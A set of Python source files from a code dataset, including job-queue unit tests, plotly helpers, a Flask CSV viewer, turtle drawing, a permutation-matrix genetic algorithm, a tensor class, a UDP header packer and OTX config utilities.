self.assertEqual(len(keys), 1)\n\n # get the new queue, should not create it (number of keys should be 1)\n queue = Queue.get_queue(name='test', priority=5)\n keys = Queue.get_keys('test')\n self.assertEqual(len(keys), 1)\n\n # check that the job is in the queue\n jobs = queue.waiting.lrange(0, -1)\n self.assertEqual(jobs, [str(job.get_pk())])\n\n # ... 
with the correct status and priority\n self.assert_job_status_and_priority(job, STATUSES.WAITING, '5')\n\n def test_adding_an_existing_job_should_do_nothing(self):\n job1 = Job.add_job(identifier='job:1', queue_name='test', priority=3)\n job2 = Job.add_job(identifier='job:1', queue_name='test', priority=3)\n\n # only one job\n self.assertEqual(job1.get_pk(), job2.get_pk())\n # is in high priority queue\n queue = Queue.get_queue(name='test', priority=3)\n self.assertEqual(queue.waiting.llen(), 1)\n # nothing in the low priority queue\n queue = Queue.get_queue(name='test', priority=1)\n self.assertEqual(queue.waiting.llen(), 0)\n\n # we should still have original priority and status\n self.assert_job_status_and_priority(job1, STATUSES.WAITING, '3')\n # idem for job2 (which is, in fact, job1)\n self.assert_job_status_and_priority(job2, STATUSES.WAITING, '3')\n\n def test_adding_an_existing_job_with_lower_priority_should_do_nothing(self):\n job1 = Job.add_job(identifier='job:1', queue_name='test', priority=3)\n job2 = Job.add_job(identifier='job:1', queue_name='test', priority=1)\n\n # only one job\n self.assertEqual(job1.get_pk(), job2.get_pk())\n # is in high priority queue\n queue = Queue.get_queue(name='test', priority=3)\n self.assertEqual(queue.waiting.llen(), 1)\n # nothing in the low priority queue\n queue = Queue.get_queue(name='test', priority=1)\n self.assertEqual(queue.waiting.llen(), 0)\n\n # we should still have original priority and status\n self.assert_job_status_and_priority(job1, STATUSES.WAITING, '3')\n # idem for job2 (which is, in fact, job1)\n self.assert_job_status_and_priority(job2, STATUSES.WAITING, '3')\n\n def test_adding_an_existing_job_with_higher_priority_should_change_its_queue(self):\n job1 = Job.add_job(identifier='job:1', queue_name='test', priority=1)\n queue1 = Queue.get_queue(name='test', priority=1)\n job2 = Job.add_job(identifier='job:1', queue_name='test', priority=2)\n queue2 = Queue.get_queue(name='test', priority=2)\n\n # only one job\n self.assertEqual(job1.get_pk(), job2.get_pk())\n # not anymore in queue with priority 1\n self.assertEqual(queue1.waiting.llen(), 0)\n # but now in queue with priority 2\n self.assertEqual(queue2.waiting.llen(), 1)\n\n # the new priority must be stored, and status should still be waiting\n self.assert_job_status_and_priority(job1, STATUSES.WAITING, '2')\n # idem for job2 (which is, in fact, job1)\n self.assert_job_status_and_priority(job2, STATUSES.WAITING, '2')\n\n def test_prepending_an_existing_job_should_move_it_at_the_beginning(self):\n queue = Queue.get_queue(name='test', priority=1)\n\n job1 = Job.add_job(identifier='job:1', queue_name='test', priority=1)\n job2 = Job.add_job(identifier='job:2', queue_name='test', priority=1)\n self.assertEqual(queue.waiting.lmembers(), [job1.get_pk(), job2.get_pk()])\n\n Job.add_job(identifier='job:2', queue_name='test', priority=1, prepend=True)\n self.assertEqual(queue.waiting.lmembers(), [job2.get_pk(), job1.get_pk()])\n\n def test_prepending_a_new_job_should_add_it_at_the_beginning(self):\n job1 = Job.add_job(identifier='job:1', queue_name='test', priority=1)\n job2 = Job.add_job(identifier='job:2', queue_name='test', priority=1, prepend=True)\n queue = Queue.get_queue(name='test', priority=1)\n self.assertEqual(queue.waiting.lmembers(), [job2.get_pk(), job1.get_pk()])\n\n def test_duration_should_compute_end_start_difference(self):\n start = datetime.utcnow()\n job = Job.add_job(identifier='job:1', queue_name='test', priority=1)\n job.hmset(start=start, end=start + 
timedelta(seconds=2))\n duration = job.duration\n self.assertEqual(duration, timedelta(seconds=2))\n\n def test_extended_job_can_accept_other_fields(self):\n class ExtendedJob(Job):\n namespace = 'test-jobstest'\n foo = fields.StringField()\n bar = fields.StringField()\n\n # create a new job\n job = ExtendedJob.add_job(identifier='job:1', queue_name='test',\n priority=1, foo='FOO', bar='BAR')\n self.assertEqual(job.foo.get(), 'FOO')\n self.assertEqual(job.bar.get(), 'BAR')\n\n # get the same job, extended fields won't be updated\n job = ExtendedJob.add_job(identifier='job:1', queue_name='test',\n priority=1, foo='FOO2', bar='BAR2')\n self.assertEqual(job.foo.get(), 'FOO')\n self.assertEqual(job.bar.get(), 'BAR')\n\n def test_using_a_subclass_of_queue_should_work(self):\n class TestQueue(Queue):\n namespace = 'test_using_a_subclass_of_queue_should_work'\n\n class TestJob(Job):\n namespace = 'test_using_a_subclass_of_queue_should_work'\n\n # not specifying queue_model should use the default Queue model\n default_queue = Queue.get_queue('test1')\n queue = TestQueue.get_queue('test1')\n Job.add_job(identifier='job:1', queue_name='test1')\n self.assertEqual(queue.waiting.llen(), 0)\n self.assertEqual(default_queue.waiting.llen(), 1)\n\n # idem with a subclass of job\n default_queue = Queue.get_queue('test2')\n queue = TestQueue.get_queue('test2')\n TestJob.add_job(identifier='job:2', queue_name='test2')\n self.assertEqual(queue.waiting.llen(), 0)\n self.assertEqual(default_queue.waiting.llen(), 1)\n\n # specifiying a queue_model in add_job should use the wanted queue\n default_queue = Queue.get_queue('test3')\n queue = TestQueue.get_queue('test3')\n Job.add_job(identifier='job:3', queue_name='test3', queue_model=TestQueue)\n self.assertEqual(queue.waiting.llen(), 1)\n self.assertEqual(default_queue.waiting.llen(), 0)\n\n # idem with a subclass of job\n default_queue = Queue.get_queue('test4')\n queue = TestQueue.get_queue('test4')\n TestJob.add_job(identifier='job:4', queue_name='test4', queue_model=TestQueue)\n self.assertEqual(queue.waiting.llen(), 1)\n self.assertEqual(default_queue.waiting.llen(), 0)\n\n # now test with a queue_model defined in the job class\n class TestJobWithQueueModel(Job):\n namespace = 'test_using_a_subclass_of_queue_should_work'\n queue_model = TestQueue\n\n default_queue = Queue.get_queue('test5')\n queue = TestQueue.get_queue('test5')\n TestJobWithQueueModel.add_job(identifier='job:5', queue_name='test5')\n self.assertEqual(queue.waiting.llen(), 1)\n self.assertEqual(default_queue.waiting.llen(), 0)\n\n\nclass ErrorsTest(LimpydBaseTest):\n\n class ExceptionWithCode(Exception):\n def __init__(self, message, code):\n super(ErrorsTest.ExceptionWithCode, self).__init__(message)\n self.message = message\n self.code = code\n\n def test_add_error_method_should_add_an_error_instance(self):\n e = ErrorsTest.ExceptionWithCode('the answer', 42)\n error1 = Error.add_error(queue_name='test', identifier='job:1', error=e)\n self.assertEqual(list(Error.collection()), [error1.get_pk()])\n Error.add_error(queue_name='test', identifier='job:1', error=e)\n self.assertEqual(len(Error.collection()), 2)\n\n def test_add_error_can_accept_an_exception_without_code(self):\n e = Exception('no code')\n error = Error.add_error(queue_name='test', identifier='job:1', error=e)\n self.assertEqual(error.code.hget(), None)\n\n def test_add_error_should_store_the_name_of_the_exception(self):\n e = Exception('foo')\n error = Error.add_error(queue_name='test', identifier='job:1', error=e)\n 
self.assertEqual(error.type.hget(), 'Exception')\n\n e = ErrorsTest.ExceptionWithCode('the answer', 42)\n error = Error.add_error(queue_name='test', identifier='job:1', error=e)\n self.assertEqual(error.type.hget(), 'ExceptionWithCode')\n\n def test_new_error_save_date_and_time_appart(self):\n e = ErrorsTest.ExceptionWithCode('the answer', 42)\n day = datetime(2012, 9, 29, 22, 58, 56)\n error = Error.add_error(queue_name='test', identifier='job:1', error=e,\n when=day)\n self.assertEqual(error.date.hget(), '2012-09-29')\n self.assertEqual(error.time.hget(), '22:58:56')\n self.assertEqual(error.datetime, day)\n\n def test_extended_error_can_accept_other_fields(self):\n class ExtendedError(Error):\n namespace = 'test-errorstest'\n foo = fields.StringField()\n bar = fields.StringField()\n\n e = ErrorsTest.ExceptionWithCode('the answer', 42)\n\n # create a new error\n error = ExtendedError.add_error(queue_name='test', identifier='job:1',\n error=e, foo='FOO', bar='BAR')\n self.assertEqual(error.foo.get(), 'FOO')\n self.assertEqual(error.bar.get(), 'BAR')\n","sub_path":"tests/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":12326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"162996900","text":"# def speak():\r\n# def v(t):\r\n# return t.lower() + '...'\r\n# return v\r\n#\r\n# Devre = speak()\r\n# print(Devre(\"A\"))\r\n\r\n\r\n# def null_decorator(func):\r\n# return func\r\n#\r\n#\r\n# def greet():\r\n# return 'Hello!'\r\n#\r\n# greet = null_decorator(greet)\r\n#\r\n# print(greet())\r\n\r\n\r\n# def greet():\r\n# return 'Hello!'.upper()\r\n#\r\n# def greet1():\r\n# return 'Hello!'.lower()\r\n#\r\n# print(greet())\r\n# print(greet1())\r\n\r\n\r\n\r\n# def uppercase(func, ):\r\n# def wrapper():\r\n# original_result = func()\r\n# modified_result = original_result.upper()\r\n# return modified_result\r\n#\r\n# def wrapper2():\r\n# original_result = func()\r\n# modified_result = original_result.lower()\r\n# return modified_result\r\n#\r\n# if func == low:\r\n# return wrapper\r\n# else:\r\n# return wrapper2\r\n#\r\n# @uppercase\r\n# def greet():\r\n# return 'Hello!'\r\n#\r\n# greet()\r\n\r\n\r\nf = \"Hello\"\r\ndef outer_func():\r\n f = \"Hi&Hello\"\r\n message = \"Devre\"\r\n return \"Hi\"\r\n\r\nv = outer_func()\r\nprint(v)\r\n#print(v.message)\r\nprint(v.f)\r\n\r\n\r\n","sub_path":"Advanced_Concepts/Decorators.py","file_name":"Decorators.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"388144002","text":"import pandas as pd\nimport plotly.plotly as py\nimport plotly.graph_objs as go\n# import plotly.figure_factory as fac\n# import plotly.offline as off\n# off.init_notebook_mode(connected=True)\n\n\nparty_color = {\n '더불어민주당': '#004EA2',\n '자유한국당': '#C8161E',\n '바른미래당': '#20B2AA',\n '민주평화당': '#40B02A',\n '정의당': '#FFCC00',\n '대한애국당': '#080B54',\n '민중당': '#F47920',\n '무소속': '#a6a6a6',\n}\n\n\ndef get_header_and_cells_from_df(df):\n header = [f'{e}' for e in df.columns.tolist()]\n values_list = df.values.tolist()\n cells = list(map(list, zip(*values_list)))\n return header, cells\n\n\ndef get_horizontal_bar_layout(\n annotations, shapes,\n title='',\n x_axis_title='',\n width='370',\n height='530',\n left=45, r=20, t=30, b=30,\n):\n return go.Layout(\n title=title,\n width=width,\n height=height,\n margin={\n 'pad': .5,\n 'l': left, 'r': r, 't': t, 'b': b,\n },\n xaxis=go.XAxis(\n title=x_axis_title,\n zeroline=False,\n showticklabels=False,\n fixedrange=True,\n ),\n yaxis=go.YAxis(\n fixedrange=True,\n ),\n annotations=annotations,\n shapes=shapes,\n )\n\n\ndef get_vertical_bar_layout(\n annotations, title='', width='370', height='400',\n x_axis_title='', y_axis_title='',\n left=30, r=20, t=30, b=60,\n):\n return go.Layout(\n title=title,\n width=width,\n height=height,\n margin={\n 'pad': 2,\n 'l': left, 'r': r, 't': t, 'b': b,\n },\n xaxis=go.XAxis(\n title=x_axis_title,\n zeroline=False,\n showticklabels=True,\n fixedrange=True,\n ),\n yaxis=dict(\n title=y_axis_title,\n zeroline=False,\n showticklabels=False,\n fixedrange=True,\n ),\n annotations=annotations,\n # shapes=shapes,\n )\n\n\ndef make_annotation(x, y):\n return go.Annotation(\n text=str(x), # text is the y-coord\n showarrow=False, # annotation w/o arrows, default is True\n x=x, # set x position\n xref='x', # position text horizontally with x-coords\n xanchor='left', # x position corresp. to center of text\n yref='y', # set y position\n yanchor='auto', # position text vertically with y-coords\n y=y, # y position corresp. to top of text\n font=go.Font(\n color='#262626', # set font color\n size=13 # and size\n )\n )\n\n\ndef get_hovertext_list(*args):\n '''\n *args: list of Series\n '''\n series_to_list = [x.tolist() for x in args]\n return list('
'.join(x) for x in zip(*series_to_list))\n\n\ndef get_party_color_dict(party_series):\n party_list = party_series.tolist()\n color_list = [party_color[x] for x in party_list]\n return dict(color=color_list)\n\n\ndef get_legend_text_party(party_series, y_start=0.94, y_height=0.05, x=0.9):\n party_counts = party_series.value_counts()\n res = []\n y_offset = 0\n for i, p in party_counts.iteritems():\n y = y_start - y_height * y_offset\n res.append(\n dict(\n text=f'{i}({p}명)',\n showarrow=False,\n xref='paper',\n yref='paper',\n x=x,\n y=y,\n )\n )\n y_offset += 1\n return res\n\n\ndef get_legend_rect_party(party_series, rect_height=0.04, rect_width=0.03,\n rect_gap=0.01, y_start=0.94, x0=0.91):\n party_counts = party_series.value_counts()\n party_list = party_counts.index.tolist()\n res = []\n\n for i, p in enumerate(party_list):\n y0 = y_start - (rect_height + rect_gap)*i\n res.append(\n {\n 'type': 'rect',\n 'xref': 'paper',\n 'yref': 'paper',\n 'x0': x0,\n 'x1': x0 + rect_width,\n 'y0': y0,\n 'y1': y0 - rect_height,\n 'fillcolor': party_color[p],\n 'line': {\n 'color': party_color[p],\n }\n }\n )\n return res\n","sub_path":"lib/plotly.py","file_name":"plotly.py","file_ext":"py","file_size_in_byte":4315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"54814763","text":"import pandas as pd\nfrom flask import Flask, render_template\nimport datetime\n\napp = Flask(__name__)\n\ndata = {'Tiempo':['Lluvioso'],'Temperatura':['30 grados'], 'Humedad':['10%']}\ndf = pd.DataFrame(data, columns = ['Tiempo','Temperatura','Humedad'])\ndf.to_csv('09052019.csv')\n\ndef myparser(x):\n return datetime.strptime(x, '%d/%m/%Y %H:%M:%S')\n\n@app.route('/')\ndef archivo():\n df= pd.read_csv('09052019.csv', parse_dates=True, date_parser=myparser, header=None)\n listk = list(df.values)\n return render_template('index.html', listk = listk)\n\nif __name__ == \"__main__\":\n app.run(debug= True, port=5000)\n\n\n\n\n","sub_path":"parcial.py","file_name":"parcial.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"544284308","text":"# function polygon with turtle object t, length of sides, n number of sides \n# Importing module turtle for GUI\nimport turtle\n\n\ndef polygon(t, length, n):\n for i in range(n):\n t.fd(length)\n t.lt(360 / n)\n\n\ndef center(t, length, n):\n t.lt(360 / n)\n t.fd(length)\n\n\n\"\"\"\ndef outer(t,length,n):\n t.lt(125)\n for i in range(n):\n t.fd(length + 20)\n t.lt(72)\n #t.fd(120)\n \"\"\"\n\n\ndef angles(t, length, n):\n # t.fd(length)\n for i in range(n):\n t.fd(length)\n t.bk(length)\n t.lt(360 / n)\n t.fd(length)\n\n\nbob = turtle.Turtle() # turtle object stored in bob\n\n# Calling function square by passing turtle object bob & length 50 pixels\n# polygon(bob,100,5)\n\n# polygon(bob,100,5)\npolygon(bob, 100, 6)\ncenter(bob, 100, 6)\nangles(bob, 100, 6)\n\n# Need to do better calling\n","sub_path":"Turtle ui/turtle_Pies2.py","file_name":"turtle_Pies2.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"198428390","text":"from Permutation import Permutation\nfrom Utility import next_permutation\n\nimport itertools\nimport math\nimport random\n\nclass Matrix():\n def __init__(self, size):\n self.size = size\n self.permutations = self.generate_permutation_pool()\n\n def set_permutations(self, permutations):\n self.size = int(len(permutations) / 2)\n self.permutations = permutations\n\n def get_all_permutations(self):\n # Returns a list of all n! permutations (as lists) of an integer n (n being the size of the matrix)\n return list(list(x) for x in itertools.permutations(list(range(1, self.size + 1))))\n\n def generate_n_permutations(self):\n # Randomly selects n unique permutations and returns them as a list\n all_permutations = self.get_all_permutations()\n selected_permutations = [] \n for _ in range(self.size):\n permutation = random.choice(all_permutations)\n selected_permutations.append(permutation)\n all_permutations.remove(permutation)\n return selected_permutations\n\n def generate_permutation_pool(self):\n # generates the 2 permutation sets that make up the matrix\n permutations1 = [Permutation(perm) for perm in self.generate_n_permutations()]\n permutations2 = [Permutation(perm) for perm in self.generate_n_permutations()]\n return permutations1 + permutations2\n\n def mutate(self):\n # By mutating a permutation at a random position gets replaced by another random permutation\n i = random.randint(0, self.size * 2 - 1)\n j = random.randint(0, self.size * 2 - 1)\n x = list(list(itertools.permutations(list(range(1, self.size + 1))))[j])\n self.permutations[i] = Permutation(x)\n \n def fitness(self):\n f = 0 \n pool1 = self.permutations[:self.size] # first set of permutations\n pool2 = self.permutations[self.size:] # second set of permutations\n\n for i in range(self.size):\n if any(pool1[i].get_symbols()) > self.size:\n print(\"!\")\n return 0\n if any(pool2[i].get_symbols()) > self.size:\n print(\"!\")\n return 0\n\n # check that all columns form permutations\n for i in range(self.size):\n perm = []\n for c in pool1:\n sym = c.get_symbols()\n perm.append(sym[i])\n if len(perm) == len(set(perm)):\n f += 1\n perm = []\n for c in pool2:\n sym = c.get_symbols()\n perm.append(sym[i])\n if len(perm) == len(set(perm)):\n f += 1\n # check that no row-wise pairs are identical\n for i in range(self.size):\n sym1 = pool1[i].get_symbols()\n sym2 = pool2[i].get_symbols()\n if len(list(zip(sym1, sym2))) != len(set(list(zip(sym1, sym2)))):\n f -= 1\n return f\n\n def get_neighbours(self):\n perms = [p.get_symbols() for p in self.permutations]\n # neighbours are obtained by shuffling each permutation, one by one, once\n # resulting in 2 * n neighbours\n for i in range(self.size * 2):\n copy = perms[:]\n copy[i] = next_permutation(copy[i])\n m = Matrix(self.size)\n m.set_permutations([Permutation(x) for x in copy])\n yield m\n\n def get_size(self):\n return self.size\n\n def get_permutations(self):\n return self.permutations\n\n def __mul__(self, i):\n m = Matrix(self.size)\n m.set_permutations([x * i for x in self.permutations])\n return m\n\n def __rmul__(self, i):\n m = Matrix(self.size)\n m.set_permutations([x * i for x in self.permutations])\n return m\n\n def __add__(self, other):\n m = Matrix(self.size)\n m.set_permutations([x[0] + x[1] for x in list(zip(self.permutations, other.permutations))])\n return m\n\n def __sub__(self, other):\n m = Matrix(self.size)\n m.set_permutations([x[0] - x[1] for x in list(zip(self.permutations, other.permutations))])\n return m\n\n def 
__str__(self):\n return str([str(c) for c in self.permutations])\n\n","sub_path":"Artificial Intelligence/Lab3/Matrix.py","file_name":"Matrix.py","file_ext":"py","file_size_in_byte":4224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"119197252","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport struct\nimport socket\nfrom common import checksum\n\n\nclass UDP(object):\n def __init__(self, src_port, dst_port, payload=''):\n self.src_port = src_port\n self.dst_port = dst_port\n self.payload = payload\n self.checksum = 0\n self.length = 8 # UDP header len\n\n def pack(self, src, dst, proto=socket.IPPROTO_UDP):\n length = self.length + len(self.payload)\n pseudo_header = struct.pack('!4s4sBBH', src, dst, 0, proto, length)\n self.checksum = checksum(pseudo_header)\n packet = struct.pack('!HHHH',\n self.src_port, self.dst_port, length, 0)\n return packet","sub_path":"plugin/udp.py","file_name":"udp.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"359723690","text":"\"\"\"\nThis module contains classes and functions representing tensors\nof trigonometric polynomials and relating operators.\n\"\"\"\n\nimport numpy as np\nfrom ffthompy.matvec import get_name\nfrom matvec import Scalar\nfrom ffthompy.mechanics.matcoef import ElasticTensor\n\n\nclass TensorFuns():\n\n def mean_ind(self):\n return tuple(np.round(np.array(self.N)/2))\n\n def __getitem__(self, ii):\n return self.val[ii]\n\n def point(self, ii):\n val = np.empty(self.shape)\n for ind in np.ndindex(*self.shape):\n val[ind] = self.val[ind][ii]\n return val\n\n def sub(self, ii):\n self.val[ii]\n\n def __repr__(self, full=False, detailed=False):\n keys = ['name', 'Y', 'shape', 'N', 'Fourier', 'norm']\n ss = \"Class : %s(%d) \\n\" % (self.__class__.__name__, self.order)\n skip = 4*' '\n nstr = np.array([key.__len__() for key in keys]).max()\n\n for key in keys:\n attr = getattr(self, key)\n if callable(attr):\n ss += '{0}{1}{3} = {2}\\n'.format(skip, key, str(attr()), (nstr-key.__len__())*' ')\n else:\n ss += '{0}{1}{3} = {2}\\n'.format(skip, key, str(attr), (nstr-key.__len__())*' ')\n\n if np.prod(np.array(self.shape)) < 20 or detailed:\n ss += '{0}norm component-wise =\\n{1}\\n'.format(skip, str(self.norm(componentwise=True)))\n ss += '{0}mean = \\n{1}\\n'.format(skip, str(self.mean()))\n if full:\n ss += '{0}val = \\n{1}'.format(skip, str(self.val))\n return ss\n\nclass Tensor(TensorFuns):\n\n def __init__(self, name='', val=None, order=None, shape=None, N=None, Y=None,\n Fourier=False, multype='scal'):\n\n self.name = name\n self.Fourier = Fourier\n\n if isinstance(val, np.ndarray): # define: val + order\n self.val = val\n if order is not None:\n self.order = int(order)\n self.shape = self.val.shape[:order]\n self.N = self.val.shape[order:]\n else:\n raise ValueError('order is not defined!')\n\n elif shape is not None and N is not None: # define: shape + N\n self.N = tuple(np.array(N, dtype=np.int))\n self.shape = tuple(np.array(shape, dtype=np.int))\n self.order = len(self.shape)\n if self.Fourier:\n self.val = np.zeros(self.shape + self.N, dtype=np.complex)\n else:\n self.val = np.zeros(self.shape + self.N, dtype=np.float)\n else:\n raise ValueError('Initialization of Tensor.')\n\n self.dim = self.N.__len__()\n if Y is None:\n self.Y = np.ones(self.dim, dtype=np.float)\n else:\n self.Y = np.array(Y, dtype=np.float)\n\n # definition of __mul__ operation\n if multype in ['scal', 'scalar']:\n self.mul_str = 'scalar'\n self.__mul__ = self.scalar_product\n elif multype in [21, '21']:\n self.mul_str = 'ij...,j...->i...'\n self.__mul__ = self._mul\n self.__call__ = self._mul\n elif multype in [42, '42']:\n self.mul_str = 'ijkl...,kl...->ij...'\n self.__mul__ = self._mul\n self.__call__ = self._mul\n else:\n self.mul_str = multype\n self.__mul__ = self._mul\n self.__call__ = self._mul\n\n def randomize(self):\n self.val = np.random.random(self.val.shape)\n return self\n\n def __neg__(self):\n res = self.copy(name='-'+self.name)\n res.val = -res.val\n return res\n\n def __add__(self, x):\n if isinstance(x, Tensor):\n assert(self.Fourier == x.Fourier)\n assert(self.val.shape==x.val.shape)\n name = get_name(self.name, '+', x.name)\n return Tensor(name=name, val=self.val+x.val, Fourier=self.Fourier,\n order=self.order, multype=self.mul_str)\n elif isinstance(x, np.ndarray) or isinstance(x, float):\n self.val += x\n return self\n else:\n raise ValueError('Tensor.__add__')\n\n def __sub__(self, x):\n return self.__add__(-x)\n\n def scalar_product(self, x):\n assert 
isinstance(x, Tensor)\n assert self.val.shape == x.val.shape\n scal = np.real(np.sum(self.val[:]*np.conj(x.val[:])))\n if not self.Fourier:\n scal = scal / np.prod(self.N)\n return scal\n\n def _mul(self, x):\n return self.einsum(self.mul_str, self, x)\n\n def __rmul__(self, x):\n if isinstance(x, Scalar):\n self.val *= Scalar.val\n return self\n\n elif np.size(x) == 1 or isinstance(x, 'float'):\n self.val *= x\n return self\n\n else:\n raise ValueError()\n\n @staticmethod\n def einsum(str_operator, x, y):\n assert(x.Fourier==y.Fourier)\n assert(x.N==y.N)\n val = np.einsum(str_operator, x.val, y.val)\n order = len(val.shape)-len(x.N)\n return Tensor(name='{0}({1})'.format(x.name, y.name),\n val=val, order=order, Fourier=x.Fourier)\n\n @staticmethod\n def norm_fun(obj, ntype):\n if ntype in ['L2', 2]:\n scal = (obj.scalar_product(obj))**0.5\n elif ntype == 1:\n scal = np.sum(np.abs(obj.val))\n elif ntype == 'inf':\n scal = np.max(np.abs(obj.val))\n else:\n msg = \"The norm (%s) of VecTri is not implemented!\" % ntype\n raise NotImplementedError(msg)\n return scal\n\n def norm(self, ntype='L2', componentwise=False):\n if componentwise:\n scal = np.empty(self.shape)\n for ind in np.ndindex(*self.shape):\n obj = Tensor(name='aux', val=self.val[ind], order=0, Fourier=self.Fourier)\n scal[ind] = self.norm_fun(obj, ntype='L2')\n return scal\n else:\n return self.norm_fun(self, ntype=ntype)\n\n def mean(self):\n \"\"\"\n Mean of trigonometric polynomial of shape of macroscopic vector.\n \"\"\"\n mean = np.zeros(self.shape)\n if self.Fourier:\n ind = self.mean_ind()\n for di in np.ndindex(*self.shape):\n mean[di] = np.real(self.val[di][ind])\n else:\n for di in np.ndindex(*self.shape):\n mean[di] = np.mean(self.val[di])\n return mean\n\n def add_mean(self, mean):\n assert(self.shape==mean.shape)\n\n if self.Fourier:\n ind = self.mean_ind()\n for di in np.ndindex(*self.shape):\n self.val[di+ind] = mean[di]\n else:\n for di in np.ndindex(*self.shape):\n self.val[di] += mean[di]\n return self\n\n def set_mean(self, mean):\n assert(self.shape==mean.shape)\n self.add_mean(-self.mean()) # set mean to zero\n\n if self.Fourier:\n ind = self.mean_ind()\n for di in np.ndindex(*self.shape):\n self.val[di+ind] = mean[di]\n else:\n for di in np.ndindex(*self.shape):\n self.val[di] += mean[di]\n return self\n\n def __eq__(self, x, full=True, tol=1e-10):\n \"\"\"\n Check the equality with other objects comparable to trig. 
polynomials.\n \"\"\"\n _bool = False\n res = None\n if isinstance(x, Tensor) and self.val.squeeze().shape==x.val.squeeze().shape:\n res = np.linalg.norm(self.val.squeeze()-x.val.squeeze())\n if resji...', self.val)\n elif self.order == 4:\n res.val = np.einsum('ijkl...->klij...', self.val)\n else:\n raise NotImplementedError()\n return res\n\n def transpose_left(self):\n res = self.empty_like(name=self.name+'.T')\n assert(self.order==4)\n res.val = np.einsum('ijkl...->jikl...', self.val)\n return res\n\n def transpose_right(self):\n res = self.empty_like(name=self.name+'.T')\n assert(self.order==4)\n res.val = np.einsum('ijkl...->ijlk...', self.val)\n return res\n\n def vec(self):\n \"\"\"\n Returns one-dimensional vector (column) version of trigonometric\n polynomial.\n \"\"\"\n return np.matrix(self.val.ravel()).transpose()\n\n def copy(self, name=None):\n if name is None:\n name = 'copy of' + self.name\n return Tensor(name=name, val=np.copy(self.val), order=self.order,\n Fourier=self.Fourier)\n\n def zeros_like(self, name=None):\n if name is None:\n name = 'zeros like ' + self.name\n return Tensor(name=name, val=np.zeros_like(self.val), order=self.order,\n Fourier=self.Fourier)\n\n def empty_like(self, name=None):\n if name is None:\n name = 'empty like ' + self.name\n return Tensor(name=name, val=np.empty_like(self.val), order=self.order,\n Fourier=self.Fourier)\n\n def calc_eigs(self, sort=True, symmetric=False, mandel=False):\n if symmetric:\n eigfun = np.linalg.eigvalsh\n else:\n eigfun = np.linalg.eigvals\n\n if self.order == 2:\n eigs = np.zeros(self.shape[-1]+self.N)\n for ind in np.ndindex(self.N):\n mat = self.val[:,:][ind]\n eigs.append(eigfun(mat))\n elif self.order == 4:\n if mandel:\n matrixfun = lambda x: ElasticTensor.create_mandel(x)\n d = self.shape[2]\n eigdim = d*(d+1)/2\n else:\n matshape = (self.shape[0]*self.shape[1], self.shape[2]*self.shape[3])\n matrixfun = lambda x: np.reshape(val[ind], matshape)\n eigdim = self.shape[2]*self.shape[3]\n\n eigs = np.zeros(self.N + (eigdim,))\n val = np.copy(self.val)\n for ii in range(self.dim):\n val = np.rollaxis(val, self.val.ndim-self.dim+ii, ii)\n\n for ind in np.ndindex(*self.N):\n mat = matrixfun(val[ind])\n eigs[ind] = eigfun(mat)\n\n eigs = np.array(eigs)\n if sort:\n eigs = np.sort(eigs, axis=0)\n return eigs\n","sub_path":"ffthompy/tensors.py","file_name":"tensors.py","file_ext":"py","file_size_in_byte":10612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"197504437","text":"\"\"\"Utils for common OTX algorithms.\"\"\"\n\n# Copyright (C) 2022 Intel Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions\n# and limitations under the License.\n\nimport copy\nimport glob\nimport multiprocessing\nimport os\nimport os.path as osp\nimport platform\nimport re\nimport shutil\nimport sys\nimport tempfile\nimport warnings\nfrom collections.abc import Mapping\nfrom importlib import import_module\nfrom typing import Any, Callable, Dict, List, Optional, Tuple, Union\n\nimport torch\nfrom mmcv import Config, ConfigDict\nfrom mmcv.utils.config import BASE_KEY, DEPRECATION_KEY\nfrom mmcv.utils.misc import import_modules_from_strings\nfrom mmcv.utils.path import check_file_exist\n\nfrom otx.algorithms.common.configs.configuration_enums import InputSizePreset\nfrom otx.algorithms.common.utils.logger import get_logger\nfrom otx.api.entities.datasets import DatasetEntity\n\nfrom ._config_utils_get_configs_by_keys import get_configs_by_keys\nfrom ._config_utils_get_configs_by_pairs import get_configs_by_pairs\n\nlogger = get_logger()\n\n\n# TODO: refactor Config\nclass MPAConfig(Config):\n \"\"\"A class that extends the base `Config` class, adds additional functionality for loading configuration files.\"\"\"\n\n @staticmethod\n def _file2dict(\n filename, use_predefined_variables=True\n ): # pylint: disable=too-many-locals, too-many-branches, too-many-statements\n \"\"\"Static method that loads the configuration file and returns a dictionary of its contents.\n\n :param filename: str, the path of the configuration file to be loaded.\n :param use_predefined_variables: bool, a flag indicating whether to substitute predefined variables in the\n configuration file.\n :return: tuple of dictionary and string. 
